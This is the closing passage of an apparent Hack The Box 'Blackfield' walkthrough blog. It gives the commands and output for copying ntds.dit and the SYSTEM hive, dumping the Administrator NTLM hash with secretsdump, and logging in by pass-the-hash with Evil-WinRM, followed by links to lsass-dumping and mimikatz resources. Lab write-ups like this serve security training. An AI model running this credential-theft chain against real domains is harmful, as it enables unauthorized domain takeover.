-a----        6/10/2020   3:46 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/10/2020   3:48 PM          16384 SeBackupPrivilegeUtils.dll

And we got it …..now its time for the system file

>*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system The operation completed successfully.And download both the files….

1
*Evil-WinRM* PS C:\temp> download system

1
*Evil-WinRM* PS C:\temp> download ntds.dit

Dumping NTLM from ntds.dit and system

Now i have both the files …. i can use secretdump.py to dump the ntlm hash from them

1
2
3
4
5
6
7
8
9
➜  blackfield python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::

And here we got the NTLM hash for the user administrator

Login as administrator

1
2
3
4
5
6
7
8
  blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee 

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator

Got root.txt

1
2
3
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
6d1--------------------------f67
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

Topic Url
rpcclient enum https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging
reset password in rpcclient https://malicious.link/post/2017/reset-ad-user-password-with-linux/
dump the lsass.dmp https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
mimikatz https://github.com/gentilkiwi/mimikatz/releases
Attacking the seBackupPrivilege https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
copy-ntds.dit tool https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug